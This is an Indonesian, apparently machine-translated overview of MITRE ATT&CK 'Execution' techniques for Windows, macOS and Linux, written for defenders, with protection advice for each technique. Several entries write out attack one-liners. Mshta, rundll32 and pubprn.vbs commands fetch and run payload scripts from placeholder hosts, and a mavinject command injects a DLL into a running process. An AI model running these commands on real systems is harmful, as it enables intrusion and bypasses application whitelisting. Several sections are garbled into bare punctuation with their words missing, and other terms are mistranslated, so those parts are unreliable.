Eksekusi

Tautan ke semua bagian:
Bagian 1. Mendapatkan akses awal (Akses Awal)
Bagian 2. Eksekusi
Bagian 3. Fastening (Kegigihan)
Bagian 4. Eskalasi Privilege
Bagian 5. Pertahanan Evasion
Bagian 6. Mendapatkan kredensial (Akses Kredensial)
Bagian 7. Penemuan
Bagian 8. Gerakan Lateral
Bagian 9. Pengumpulan data (Pengumpulan)
Bagian 10 Pengelupasan
Bagian 11. Perintah dan Kontrol

Fase "Eksekusi" menggambarkan penggunaan oleh penyerang sarana dan metode eksekusi jauh dan lokal dalam sistem serangan berbagai perintah, skrip dan file yang dapat dieksekusi yang dikirim ke sana pada tahap sebelumnya.

Penulis tidak bertanggung jawab atas konsekuensi yang mungkin dari penerapan informasi yang ditetapkan dalam artikel, dan juga meminta maaf atas kemungkinan ketidakakuratan yang dibuat dalam beberapa formulasi dan ketentuan. Informasi yang dipublikasikan adalah pengungkapan kembali gratis konten MITER ATT & CK.

AppleScript

Sistem: macOS
Hak: Pengguna
Deskripsi: Bahasa AppleScript memiliki kemampuan untuk bekerja dengan Acara Apple - pesan dipertukarkan antara aplikasi sebagai bagian dari komunikasi antarproses (IPC). Menggunakan Apple Event, Anda dapat berinteraksi dengan hampir semua aplikasi yang terbuka secara lokal atau jarak jauh, memicu acara seperti membuka jendela dan menekan tombol. Skrip dijalankan menggunakan perintah: Osascript -e <script> .
Penyerang dapat menggunakan AppleScript untuk secara diam-diam membuka koneksi SSH ke host jarak jauh, memberikan pengguna dialog palsu. AppleScript juga dapat digunakan dalam jenis serangan yang lebih umum, seperti organisasi Shell Terbalik.

Rekomendasi perlindungan: Wajib verifikasi untuk menjalankan skrip AppleScript untuk tanda tangan dari pengembang tepercaya.

CMSTP (AppLocker ByPass - CMSTP)

Sistem: Windows
Hak: Pengguna
Deskripsi: Penginstal Profil Manajer Koneksi Microsoft (cmstp.exe) adalah utilitas " Connection Manager Profile Installer " yang ada di dalam Windows. Cmstp.exe dapat mengambil inf-file sebagai parameter, sehingga penyerang dapat menyiapkan INF berbahaya khusus untuk mengunduh dan mengeksekusi DLL atau skrip (* .sct) dari server jarak jauh yang melewati AppLocker dan kunci lainnya, karena cmstp.exe ditandatangani dengan sertifikat digital Microsoft.

Rekomendasi perlindungan: Memblokir peluncuran aplikasi yang berpotensi berbahaya. Memantau startup C: \ Windows \ System32 \ cmstp.exe .

Antarmuka Baris Perintah

Sistem: Windows, Linux, macOS
Hak: Pengguna, Administrator, Sistem
Deskripsi: Anda dapat berinteraksi dengan antarmuka baris perintah secara lokal, dari jarak jauh melalui perangkat lunak akses jarak jauh, menggunakan Reverse Shell, dll. Perintah dijalankan dengan tingkat izin saat ini dari proses antarmuka baris perintah, jika perintah tidak termasuk panggilan ke proses yang mengubah izin untuk mengeksekusi perintah (misalnya, tugas yang dijadwalkan).

Rekomendasi Keamanan: Audit dan / atau kunci baris perintah menggunakan alat seperti AppLocker atau kebijakan pembatasan perangkat lunak.

Item Panel Kontrol

Sistem: Windows
Hak: Pengguna, Administrator, Sistem
Deskripsi: Taktiknya adalah menggunakan elemen-elemen Panel Kontrol Windows oleh penyerang untuk menjalankan perintah sewenang-wenang sebagai muatan (misalnya, virus Reaver ). Objek berbahaya dapat disamarkan sebagai kontrol standar dan dikirim ke sistem menggunakan lampiran phishing. Utilitas untuk melihat dan mengonfigurasi pengaturan Windows adalah file exe yang terdaftar dan file CPL dari elemen panel kontrol Windows. File CPL sebenarnya berganti nama menjadi DLL yang dapat dijalankan dengan cara berikut:

• langsung dari baris perintah: control.exe <file.cpl> ;
• menggunakan fungsi API dari shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
• klik dua kali pada file cpl.

CPL terdaftar yang disimpan di System32 secara otomatis ditampilkan di Panel Kontrol Windows dan memiliki pengidentifikasi unik yang disimpan dalam registri:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpace

Informasi tentang CPL lain, misalnya, nama tampilan dan jalur ke file cpl, disimpan di bagian Cpls dan Extended Properties pada bagian ini:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control Panel

Beberapa CPL yang diluncurkan melalui shell terdaftar di bagian ini:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlers

Rekomendasi perlindungan: Batasi peluncuran dan penyimpanan file item panel kontrol hanya di folder yang dilindungi (misalnya, C: \ Windows \ System32 ), aktifkan Kontrol Akun Pengguna (UAC) dan AppLocker untuk mencegah perubahan yang tidak sah pada sistem. Tentu saja, penggunaan perangkat lunak antivirus.

Dynamic Data Exchange Protocol (DDE), Exec Kode Macro di MSWord

Sistem: Windows
Hak: Pengguna
Deskripsi: DDE adalah protokol untuk interaksi aplikasi yang berbagi data dan memori bersama untuk olahpesan. Misalnya, dokumen Word mungkin berisi tabel yang diperbarui secara otomatis dari dokumen Excel. Teknik ini terdiri dari mengeksploitasi kerentanan dalam aplikasi MS Office terkait dengan penggunaan protokol DDE di MS Office. Penyerang dapat menanamkan objek dalam dokumen MS Office yang berisi perintah yang akan dieksekusi ketika dokumen dibuka. Misalnya, dokumen Word mungkin berisi objek bidang yang nilainya menunjukkan perintah {DDEAUTO <perintah, misalnya, c: \ windows \ system32 \ cmd.exe>} , yang akan dieksekusi ketika dokumen dibuka. Meskipun kehilangan relevansi, DDE dapat diaktifkan, termasuk di Windows 10 dan MS Office 2016, menggunakan kunci:
AllowDDE (DWORD) = 2 di kunci registri:
HKEY_CURRENT_USER \ Software \ Microsoft \ Office \ <versi Office> \ Word \ Security .

Rekomendasi perlindungan: Ikuti rekomendasi Microsoft dan instal pembaruan MS Office yang sesuai. Di Windows 10, Anda juga dapat mengaktifkan parameter Attack Surface Reduction (ASR) untuk melindungi diri Anda dari serangan DDE dan proses anak oleh aplikasi MS Office.

Eksekusi melalui API

Sistem: Windows
Hak: Pengguna, Administrator, Sistem
Deskripsi: Penyerang dapat menggunakan API untuk menjalankan file biner. Fungsi API seperti CreateProcess memungkinkan program dan skrip untuk memulai proses dengan menentukan jalur dan argumen yang diperlukan. Fungsi API yang dapat digunakan untuk mengeksekusi file biner:

• CreateProcessA (), CreateProcessW ();
• CreateProcessAsUserA (), CreateProcessAsUserW ();
• CreateProcessInternalA (), CreateProcessInternalW ();
• CreateProcessWithLogonW (), CreateProcessWithTokenW ();
• LoadLibraryA (), LoadLibraryW ();
• LoadLibraryExA (), LoadLibraryExW ();
• LoadModule ();
• LoadPackagedLibrary ();
• WinExec ();
• ShellExecuteA (), ShellExecuteW ();
• ShellExecuteExA (), ShellExecuteExW ().

Rekomendasi perlindungan: Panggilan fungsi API adalah kejadian umum yang sulit dibedakan dari aktivitas jahat. Vektor perlindungan harus diarahkan untuk mencegah peluncuran alat penyerang di awal rantai serangan, mendeteksi perilaku jahat dan memblokir perangkat lunak yang berpotensi berbahaya.

Eksekusi melalui Modul Load

Sistem: Windows
Hak: Pengguna
Deskripsi: Dimungkinkan untuk mengatur eksekusi kode menggunakan pemuat modul Windows - NTDLL.dll, yang dapat memuat pustaka DLL pada jalur lokal atau jaringan yang sewenang-wenang. NTDLL.dll adalah bagian dari Windows API dan dapat memanggil fungsi-fungsi seperti CreateProcess () dan LoadLibrary () .

Rekomendasi perlindungan: Panggilan fungsi API adalah fungsi OS biasa yang sulit dibedakan dari aktivitas jahat. Vektor perlindungan harus diarahkan untuk mencegah peluncuran alat penyerang di awal rantai serangan. masuk akal untuk mempertimbangkan membatasi pemuatan DLL ke direktori % SystemRoot% dan % ProgramFiles% .

Eksploitasi untuk Eksekusi Klien

Sistem: Windows, Linux, macOS
Hak: Pengguna
Deskripsi: Teknik melibatkan eksekusi kode jarak jauh menggunakan eksploitasi dalam perangkat lunak pengguna. Kehadiran kerentanan dalam perangkat lunak sering dikaitkan dengan pelanggaran oleh pengembang perangkat lunak terhadap persyaratan pemrograman yang aman, yang pada akhirnya mengarah pada kemungkinan menyebabkan perilaku perangkat lunak yang tidak terduga.
Pertimbangkan beberapa jenis eksploitasi:

• Eksploitasi browser. Browser web adalah target ketika penyerang menggunakan tautan pemuatan bayangan dan tautan phishing. Sistem yang diserang dapat dikompromikan melalui browser normal setelah pengguna melakukan tindakan tertentu, misalnya, mengikuti tautan yang ditentukan dalam email phishing.
• Eksploitasi aplikasi kantor. File berbahaya dikirim sebagai lampiran atau tautan unduhan. Untuk mengeksploitasi kerentanan, pengguna harus membuka dokumen atau file untuk meluncurkan exploit.
• Eksploitasi aplikasi pihak ketiga. Aplikasi umum, seperti Adobe Reader dan Flash, sering digunakan di lingkungan perusahaan, ditargetkan oleh penjahat cyber. Bergantung pada perangkat lunak dan sifat kerentanan, kerentanan dieksploitasi di browser atau ketika pengguna membuka file, misalnya, objek Flash dapat dikirim dalam dokumen MS Office.

Rekomendasi perlindungan: Pemasangan pembaruan yang tepat waktu untuk aplikasi yang digunakan. Penggunaan berbagai cara isolasi aplikasi yang berpotensi rentan - kotak pasir, mikrosegmentasi, dan alat virtualisasi, misalnya, Sandboxie untuk Windows dan Apparmor, Docker untuk Linux. Sistem perlindungan eksploit seperti Windows Defender Exploit Guard (WDEG) untuk Windows 10 atau Enhanced Mitigation Experience Toolkit (EMET) untuk versi Windows sebelumnya juga disarankan.

Antarmuka Pengguna Grafis

Sistem: Windows, Linux, macOS
Hak: Pengguna, administrator, sistem
Deskripsi: File atau skrip yang dapat dieksekusi diluncurkan ketika berinteraksi dengan file melalui antarmuka pengguna grafis (GUI) dalam sesi interaktif atau jauh, misalnya, melalui protokol RDP.

Kiat Keamanan: Lindungi kredensial yang dapat digunakan untuk terhubung dari jarak jauh ke sistem. Identifikasi utilitas sistem yang tidak perlu, perangkat lunak pihak ketiga yang dapat digunakan untuk memasuki mode remote interaktif.

InstalUtil

Sistem: Windows
Hak: Pengguna
Deskripsi: InstallUtil adalah utilitas baris perintah Windows yang dapat menginstal dan menghapus aplikasi yang sesuai dengan spesifikasi .NET Framework. Installutil diinstal secara otomatis dengan VisualStudio. File InstallUtil.exe ditandatangani oleh sertifikat Microsoft dan disimpan di:
C: \ Windows \ Microsoft.NET \ Framework \ v [versi] \ InstallUtil.exe
Penyerang dapat menggunakan fungsionalitas InstallUtil untuk mengeksekusi kode proxy dan memotong daftar putih aplikasi.

Rekomendasi perlindungan: Ada kemungkinan bahwa InstallUtil tidak digunakan pada sistem Anda, jadi pertimbangkan untuk memblokir instalasi InstallUtil.exe.

Driver LSASS (Driver LSASS)

Sistem: Windows
Hak: Administrator, sistem
Deskripsi: Otoritas Keamanan Lokal (LSA) adalah subsistem Windows yang menyediakan otentikasi pengguna. LSA mencakup beberapa DLL saling terhubung dinamis yang berjalan dalam proses LSASS.exe. Penyerang dapat menyerang LSASS.exe dengan mengganti atau menambahkan driver LSA tidak sah dan kemudian mengeksekusi kode arbitrer. Teknik ini diterapkan pada malware Pasam dan Wingbird, yang “memuntahkan” DLL yang dimodifikasi yang digunakan untuk memuat LSASS. Dalam kasus ini, kode berbahaya dijalankan sebelum DLL tidak sah menyebabkan kerusakan dan layanan LSASS mogok berikutnya.

Rekomendasi perlindungan: Di Windows 8.1 dan Windows Server 2012 R2, aktifkan perlindungan LSA dengan menetapkan kunci registri:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ RunAsPPL
ke nilai kata : 00000001

Perlindungan ini memastikan bahwa plugin dan driver yang dimuat LSA ditandatangani secara digital oleh Microsoft. Di Windows 10 dan Server 2016, aktifkan Penjaga Kredensial Windows Defender untuk menjalankan lsass.exe di lingkungan virtual yang terisolasi. Aktifkan mode pencarian DLL aman untuk mengurangi risiko pustaka berbahaya memuat ke lsass.exe:
HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ SafeDllSearchMode .

Launchctl

Sistem: macOS
Hak: Pengguna, Administrator
Deskripsi: Launchctl - utilitas untuk mengelola layanan Launchd. Menggunakan Launchctl, Anda dapat mengelola layanan sistem dan pengguna (LaunchDeamons dan LaunchAgents), serta menjalankan perintah dan program. Launchctl mendukung sub-perintah baris perintah, interaktif atau dialihkan dari input standar:
launchctl submit -l [labelname] - / Path / to / thing / to / execute '' arg "'' arg" '' arg " .
Dengan memulai dan memulai kembali layanan dan daemon, penyerang dapat mengeksekusi kode dan bahkan mem-by-by-whitelist jika launchctl adalah proses yang diotorisasi, namun memuat, membongkar dan memulai kembali layanan dan daemon mungkin memerlukan hak yang lebih tinggi.

Rekomendasi Keamanan: Membatasi hak pengguna untuk membuat Agen Peluncuran dan meluncurkan Launch Deamons menggunakan Kebijakan Grup. Menggunakan aplikasi KnockKnock , Anda dapat menemukan program yang menggunakan launchctl untuk mengelola Launch Agents dan Launch Deamons.

Berkinerja dengan Penjadwalan Pekerjaan Lokal

Sistem: Linux, macOS
Hak: Pengguna, Administrator, root
Deskripsi: Penyerang dapat membuat tugas dalam sistem yang diserang untuk peluncuran program tanpa izin saat sistem melakukan booting atau sesuai jadwal. Sistem Linux dan Apple mendukung beberapa metode untuk menjadwalkan peluncuran tugas latar belakang periodik: cron, at, launchd. Tidak seperti Windows Task Scheduler, penjadwalan tugas pada sistem Linux tidak dapat dilakukan dari jarak jauh, kecuali untuk menggunakan sesi jarak jauh seperti SSH.

Rekomendasi perlindungan: Membatasi hak pengguna untuk membuat tugas terjadwal, memblokir utilitas sistem dan perangkat lunak lain yang dapat digunakan untuk menjadwalkan tugas.

Mshta

Sistem: Windows
Hak: Pengguna
Deskripsi: Mshta.exe (terletak di C: \ Windows \ System32 \ ) adalah utilitas yang menjalankan aplikasi Microsoft HTML (* .HTA). Aplikasi HTA berjalan menggunakan teknologi yang sama seperti yang digunakan InternetExplorer, tetapi di luar browser. Karena fakta bahwa Mshta memproses file melewati pengaturan keamanan browser, penyerang dapat menggunakan mshta.exe untuk proksi eksekusi file HTA berbahaya, Javascript atau VBScript. File jahat dapat diluncurkan melalui skrip bawaan:
mshta vbscript: Tutup (Jalankan ("GetObject (" "script: https [:] // webserver / payload [.] sct" ")")))

atau langsung, di URL:
mshta http [:] // webserver / payload [.] hta

Rekomendasi perlindungan: Fungsionalitas mshta.exe dikaitkan dengan versi IE yang lebih lama yang telah mencapai akhir siklus hidupnya. Blokir Mshta.exe jika Anda tidak menggunakan fungsinya.

Powerhell

Sistem: Windows
Hak: Pengguna, Administrator
Deskripsi: PowerShell (PS) adalah antarmuka baris perintah interaktif dan lingkungan skrip yang disertakan dengan Windows. Penyerang dapat menggunakan PS untuk mengumpulkan informasi dan mengeksekusi kode. Sebagai contoh, cmdlet Mulai-Proses dapat menjalankan file yang dapat dieksekusi, cmdlet Invoke-Command akan menjalankan perintah secara lokal atau pada komputer jarak jauh. PS juga dapat digunakan untuk mengunduh dan menjalankan file yang dapat dieksekusi dari Internet, tanpa menyimpannya ke hard drive Anda. Untuk koneksi jarak jauh menggunakan PS, Anda memerlukan hak administrator. Ada sejumlah alat untuk menyerang PS:

• Kekaisaran
• Powersploit
• PSAttack

Rekomendasi perlindungan: PS dapat dihapus dari sistem jika tidak diperlukan. Jika PS diperlukan, maka administrator harus dibatasi untuk menjalankannya hanya dengan menjalankan skrip yang ditandatangani. Nonaktifkan layanan WinRM untuk mencegah eksekusi skrip PS secara remote. Perlu dicatat bahwa ada metode untuk memotong kebijakan eksekusi skrip PS .

Regsvcs / regasm

Sistem: Windows
Hak: Pengguna, Administrator
Deskripsi: Regsvcs dan Regasm adalah utilitas utilitas Windows yang digunakan untuk mendaftar dengan sistem perakitan .NET Component Object Model (COM). Kedua file ditandatangani secara digital oleh Microsoft. Penyerang dapat menggunakan Regsvcs dan Regasm untuk eksekusi kode proksi ketika atributnya adalah kode yang harus dijalankan sebelum mendaftar atau membatalkan pendaftaran: [ComRegisterFunction] atau [ComUnregisterFunction]. Kode dengan atribut tersebut dapat diluncurkan bahkan jika proses berjalan dengan hak istimewa yang tidak memadai atau bahkan macet saat startup.

Rekomendasi perlindungan: Blokir Regsvcs.exe dan Regasm.exe jika tidak digunakan di sistem atau jaringan Anda.

Regsvr32 (Squiblydoo)

Sistem: Windows
Hak: Pengguna, Administrator
Deskripsi: Regsvr32.exe adalah utilitas konsol untuk mendaftarkan dan membatalkan pendaftaran kontrol OLE, seperti ActiveX dan DLL, dalam registri. Regsvr32.exe ditandatangani secara digital oleh Microsoft dan dapat digunakan untuk eksekusi kode proxy. Misalnya, menggunakan Regsvr32, Anda dapat mengunduh file XML yang berisi potongan kode Java (skrip) yang akan mem-bypass daftar putih.

Rekomendasi perlindungan: Attack Surface Reduction (ASR) di EMET dan Advanced Theart Protection di Windows Defender dapat memblokir penggunaan Regsvr32.exe untuk memotong daftar putih.

Rundll32 (Poweliks)

Sistem: Windows
Hak: Pengguna
Deskripsi: Rundll32.exe adalah utilitas sistem untuk meluncurkan program yang terletak di pustaka yang terhubung secara dinamis yang dapat dipanggil untuk mem-proksi file biner, menjalankan file kontrol Windows (.cpl) melalui fungsi shel32.dll tidak berdokumen - Control_RunDLL dan Control_RunDLLAsUser . Mengklik dua kali pada file .cpl juga menyebabkan Rundll32.exe dijalankan. Rundll32 juga dapat digunakan untuk mengeksekusi skrip seperti JavaScript:
rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [. contoh [.] com / malicious.sct") "
Metode menggunakan rundll32.exe di atas terdeteksi oleh perangkat lunak antivirus seperti virus seperti Poweliks.
Rekomendasi perlindungan: Attack Surface Reduction (ASR) di EMET dan Advanced Theart Protection di Windows Defender dapat memblokir penggunaan Rundll32.exe untuk mem-bypass daftar putih.

Berjalan melalui Tugas Terjadwal Windows

Sistem: Windows
Hak: Pengguna, Administrator, Sistem
Deskripsi: Utilitas seperti at, schtasks, dan Windows Task Scheduler dapat digunakan untuk menjadwalkan program dan skrip untuk dijalankan pada tanggal dan waktu tertentu. Tugas dapat dijadwalkan pada sistem jarak jauh, asalkan RPC digunakan untuk otentikasi dan printer dan berbagi file diaktifkan. Selain itu, hak administrator diperlukan untuk menjadwalkan tugas pada sistem jarak jauh. Penyerang dapat menggunakan penjadwalan tugas jarak jauh untuk menjalankan program saat startup sistem atau dalam konteks akun tertentu.

Rekomendasi perlindungan: Aktifkan pembatasan hak untuk membuat tugas bagi pengguna atas nama Sistem dalam registri:
HKLM \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ SubmitControl = 0
Catatan:SubmitControl = 1, memungkinkan anggota grup Server Operator untuk membuat pekerjaan.

Juga, konfigurasikan GPO yang sesuai:
Konfigurasi Komputer> [Kebijakan]> Pengaturan Windows> Pengaturan Keamanan> Kebijakan Lokal> Opsi Keamanan: Kontroler Domain: Izinkan operator server untuk menjadwalkan tugas: dinonaktifkan
Konfigurasi Komputer> [Kebijakan]> Pengaturan Windows> Pengaturan Keamanan> Lokal Kebijakan> Penetapan Hak Pengguna: Tingkatkan prioritas penjadwalan
Pertimbangkan menggunakan PowerSploit Framework, yang berisi modul PowerUP untuk menemukan kerentanan dalam penyelesaian tugas yang dijadwalkan, dalam aktivitas Anda.

Scripting

Sistem: Windows, Linux, macOS
Hak:
Deskripsi Pengguna : Penyerang dapat menggunakan skrip untuk mengotomatiskan tindakan mereka, mempercepat tugas operasional dan, sebagai akibatnya, mengurangi waktu yang diperlukan untuk mendapatkan akses. Beberapa bahasa scripting dapat digunakan untuk mem-bypass mekanisme untuk proses pemantauan dengan secara langsung berinteraksi dengan OS di tingkat API alih-alih memanggil program lain. Skrip dapat disematkan dalam dokumen Office sebagai makro dan kemudian digunakan untuk serangan phishing. Dalam hal ini, para penyerang mengharapkan pengguna untuk menjalankan file makro atau bahwa pengguna setuju untuk mengaktifkan makro. Ada beberapa kerangka kerja populer untuk mengimplementasikan scripting - Metasploit, Veil, PowerSploit.

Kiat Keamanan: Batasi akses ke skrip seperti VBScript atau PowerShell. Di Windows, konfigurasikan pengaturan keamanan MS Office dengan mengaktifkan tampilan aman dan larangan makro melalui GPO. Jika makro diperlukan, maka hanya jalankan makro yang tepercaya secara digital untuk dijalankan. Gunakan segmentasi mikro dan virtualisasi aplikasi, misalnya, Sandboxie untuk Windows dan Apparmor, Docker untuk Linux.

Memulai Layanan (Eksekusi Layanan)

Sistem:
Hak Windows : Administrator,
Deskripsi Sistem : Penyerang dapat mengeksekusi kode biner, perintah, atau skrip menggunakan metode khusus berinteraksi dengan layanan Windows, misalnya, dengan menggunakan Service Control Manager (SCM), Anda dapat membuat layanan baru dan memodifikasi yang sedang berjalan.

Rekomendasi Perlindungan:Pastikan bahwa pengaturan privilege saat ini pada sistem melarang peluncuran layanan dengan privilege tinggi dari pengguna dengan privilege rendah. Pastikan bahwa file yang dapat dieksekusi dengan izin tinggi pada sistem tidak dapat diganti atau dimodifikasi oleh pengguna dengan izin yang lebih rendah. Pertimbangkan untuk menggunakan alat untuk membatasi peluncuran program yang berpotensi berbahaya menggunakan AppLocker dan mengonfigurasi Kebijakan Pembatasan Perangkat Lunak .

Eksekusi melalui Eksekusi Biner

Sistem:
Hak Windows :
Deskripsi Pengguna : File biner yang ditandatangani dengan sertifikat digital tepercaya dapat dijalankan pada sistem Windows yang dilindungi oleh verifikasi tanda tangan digital. Beberapa file Microsoft yang ditandatangani secara default selama instalasi Windows dapat digunakan untuk
mem -proksi peluncuran file lain: Mavinject.exe adalah utilitas Windows yang memungkinkan kode untuk dieksekusi. Mavinject dapat digunakan untuk memasukkan DLL ke dalam proses yang sedang berjalan:
"C: \ Program Files \ Common Files \ microsoft shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH DLL]
C: \ Windows \ system32 \ mavinject.exe [PID ] / INJECTRUNNING [PATH DLL]
SyncAppvPublishingServer.exe- dapat digunakan untuk menjalankan skrip PowerShell tanpa menjalankan PowerShell.exe.
Ada beberapa binari yang serupa .

Rekomendasi perlindungan: Banyak file yang ditandatangani mungkin tidak digunakan di sistem Anda, jadi pertimbangkan untuk memblokir peluncurannya.

Eksekusi melalui Skrip yang Ditandatangani (Eksekusi Skrip Bertanda)

: Windows
:
: , , , , PubPrn.vbs Microsoft :
cscript C:\Windows\System32\Printing_Admin_Scripts\ru-RU\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

: , .

Source

: Linux macOS
:
: Source — , , , , . Source :
source /path/to/filename [arguments] . /path/to/filename [arguments]
. . Source , «x», .

: Untuk mencegah penggunaan perintah bawaan dalam sistem cukup sulit karena legalitasnya, oleh karena itu, vektor perlindungan harus diarahkan untuk mencegah tindakan jahat pada tahap awal serangan, misalnya, pada tahap pengiriman atau pembuatan file berbahaya dalam sistem.

Spasi setelah Nama file

Sistem: Linux, macOS
Hak: Deskripsi Pengguna
:Penyerang dapat menyembunyikan tipe file yang sebenarnya dengan mengubah ekstensinya. Untuk jenis file tertentu (tidak bekerja dengan file .app), menambahkan karakter spasi ke akhir nama file akan mengubah cara file diproses oleh sistem operasi. Misalnya, jika ada file yang dapat dieksekusi, Mach-O dengan nama evil.bin, maka ketika pengguna mengklik dua kali, OS akan meluncurkan Terminal.app dan menjalankannya. Jika file yang sama diubah namanya menjadi evil.txt, maka dengan klik dua kali file itu akan mulai di editor teks. Namun, jika file diubah namanya menjadi "evil.txt" (spasi di akhir), maka dengan mengklik dua kali jenis file yang benar, OS akan ditentukan dan file biner akan dimulai. Penyerang dapat menggunakan teknik ini untuk menipu pengguna agar meluncurkan file yang dapat dieksekusi berbahaya.

Rekomendasi Perlindungan:Penggunaan teknik ini sulit dicegah karena penyerang menggunakan mekanisme operasi standar OS, sehingga vektor perlindungan harus ditujukan untuk mencegah tindakan jahat pada tahap awal serangan, misalnya, pada tahap pengiriman atau pembuatan file berbahaya dalam sistem.

Eksekusi menggunakan perangkat lunak administrasi jaringan pihak ketiga (Perangkat Lunak Pihak Ketiga)

: Windows, Linux, macOS
: , , System
: , (SCCM, VNC, HBSS, Altris ..). , . , . , .

:Periksa tingkat keamanan sistem penyebaran perangkat lunak Anda. Pastikan akses ke sistem manajemen perangkat lunak terbatas, terkontrol, dan terlindungi. Gunakan kebijakan pra-persetujuan wajib secara ketat untuk penyebaran perangkat lunak jarak jauh. Memberikan akses ke sistem penyebaran perangkat lunak ke sejumlah administrator, memastikan isolasi sistem penyebaran perangkat lunak. Pastikan kredensial untuk akses ke sistem penyebaran perangkat lunak unik dan tidak digunakan dalam layanan lain di jaringan perusahaan. Jika sistem penyebaran perangkat lunak dikonfigurasikan untuk hanya menjalankan file biner yang ditandatangani, maka verifikasi bahwa sertifikat tepercaya tidak disimpan dalam sistem penyebaran perangkat lunak itu sendiri, tetapi terletak pada sistem yang tidak dapat diakses dari jarak jauh.

Tim Perangkap

Sistem: Linux, macOS
Hak: Pengguna, administrator
Keterangan: Perintah trap digunakan untuk melindungi skrip dari gangguan (ctrl + c, ctrl + d, ctrl + z, dll.). Jika skrip menerima sinyal interupsi yang ditentukan dalam argumen perintah trap, maka ia memproses sinyal interupsi sendiri, sementara shell tidak akan memproses sinyal seperti itu. Penyerang dapat menggunakan perangkap untuk mendaftarkan kode yang akan dieksekusi ketika shell menerima sinyal interupsi tertentu.

Rekomendasi Perlindungan:Penggunaan teknik ini sulit dicegah, karena penyerang menggunakan mekanisme standar OS. Vektor perlindungan harus ditujukan untuk mencegah tindakan jahat pada tahap awal serangan, misalnya, pada tahap pengiriman atau pembuatan file berbahaya dalam sistem.

Berjalan melalui Utilitas Pengembang Tepercaya

Sistem:
Hak Windows :
Deskripsi Pengguna : Ada banyak utilitas yang digunakan oleh pengembang perangkat lunak dan yang dapat digunakan untuk mengeksekusi kode dalam berbagai bentuk selama pengembangan perangkat lunak, debugging, dan rekayasa terbalik. Utilitas ini sering kali ditandatangani dengan sertifikat digital yang memungkinkan mereka untuk mem-proksi kode berbahaya di OS, memintas mekanisme keamanan dan lembar putih aplikasi.

MsbulidAdalah platform pengembangan perangkat lunak yang digunakan dalam Visual Studio. Ini menggunakan proyek dalam bentuk file XML yang menggambarkan persyaratan untuk membangun berbagai platform dan konfigurasi. MSBuild dari .NET versi 4 memungkinkan Anda untuk memasukkan kode C # ke proyek XML, kompilasi, dan kemudian jalankan. MSBulid.exe ditandatangani oleh Microsoft Digital Certificate.
DNX - .Net Execution Environmant (dnx.exe) adalah kit pengembangan untuk Visual Studio Enterprise. Dihentikan sejak .NET Core CLI pada tahun 2016. DNX tidak ada pada build Windows standar dan hanya dapat ada pada host pengembang saat menggunakan .Net Core dan ASP.NET Core 1.0. Dnx.exe ditandatangani secara digital dan dapat digunakan untuk eksekusi kode proxy.
RCSI- antarmuka baris perintah non-interaktif untuk C #, mirip dengan csi.exe. Itu diperkenalkan di versi sebelumnya dari platform kompiler Roslyn .Net. Rcsi.exe ditandatangani oleh Microsoft Digital Certificate. File skrip C # .csx dapat ditulis dan dieksekusi menggunakan Rcsi.exe pada prompt perintah Windows.
WinDbg / CDB adalah kernel MS Windows dan utilitas untuk debugging dalam mode pengguna. Microsoft console debugger cdb.exe juga merupakan mode-debugger pengguna. Kedua utilitas dapat digunakan sebagai alat mandiri. Biasa digunakan dalam pengembangan perangkat lunak, rekayasa terbalik, dan tidak dapat ditemukan pada sistem Windows biasa. Baik file WinDbg.exe dan CDB.exe ditandatangani oleh Microsoft Digital Certificate dan dapat digunakan untuk kode proxy.
Pelacak- Utilitas pelacakan file tracker.exe. Termasuk dalam. NET sebagai bagian dari MSBuild. Digunakan untuk mendaftarkan panggilan dalam sistem file Windows 10. Penyerang dapat menggunakan tracker.exe untuk menjalankan DLL dalam berbagai proses. Tracker.exe juga ditandatangani dengan sertifikat Microsoft.

Rekomendasi perlindungan: Semua file di atas harus dihapus dari sistem jika tidak digunakan untuk tujuan yang dimaksudkan oleh pengguna.

Eksekusi Pengguna

Sistem: Windows, Linux, macOS
Hak:
Deskripsi Pengguna : Penyerang dapat mengandalkan tindakan tertentu dari pengguna untuk melakukan tindakan tertentu. Ini bisa berupa eksekusi kode langsung ketika pengguna membuka file yang dapat dieksekusi berbahaya yang dikirim sebagai lampiran phishing dengan ikon dan ekstensi file dokumen yang terlihat. Terkadang, teknik lain dapat digunakan, misalnya, ketika pengguna mengklik tautan dalam email phishing, yang mengarah pada eksploitasi kerentanan browser. Teknik "eksekusi pengguna" sering digunakan pada tahap lain invasi, misalnya, ketika seorang penyerang menempatkan file di direktori bersama atau di desktop pengguna, berharap bahwa ia "mengklik" di atasnya.

Tip Perlindungan: Tingkatkan kesadaran pengguna. Memblokir unduhan file seperti .scr, .exe, .pif, .cpl, dll. Penggunaan perangkat lunak antivirus dan penerapan sistem IPS.

Instrumentasi Manajemen Windows (WMI)

Sistem:
Hak Windows : Pengguna, Administrator
Keterangan: WMI adalah alat untuk mengelola Windows, yang menyediakan akses lokal dan jarak jauh ke komponen sistem Windows. WMI menggunakan SMB dan RPCS (berjalan di port 135). Penyerang dapat menggunakan WMI untuk berinteraksi dengan sistem lokal dan jarak jauh, dan juga sebagai sarana untuk melakukan banyak operasi taktis, seperti mengumpulkan informasi pada tahap tinjauan sumber daya (penemuan) dan eksekusi file jarak jauh selama "gerakan literal".

Rekomendasi Perlindungan:Menonaktifkan WMI dan RPCS dapat menyebabkan ketidakstabilan sistem. Secara default, hanya administrator yang dapat terhubung ke sistem dari jarak jauh melalui WMI. Cegah duplikasi hak istimewa antara akun administratif dan akun istimewa lainnya.

Manajemen Jarak Jauh Windows (WinRM)

: Windows
: ,
: Windows Remote Management (WinRM) — , (, , , . winrm , PowerShell.

: WinRM. , WinRM . WinRM , WinRM .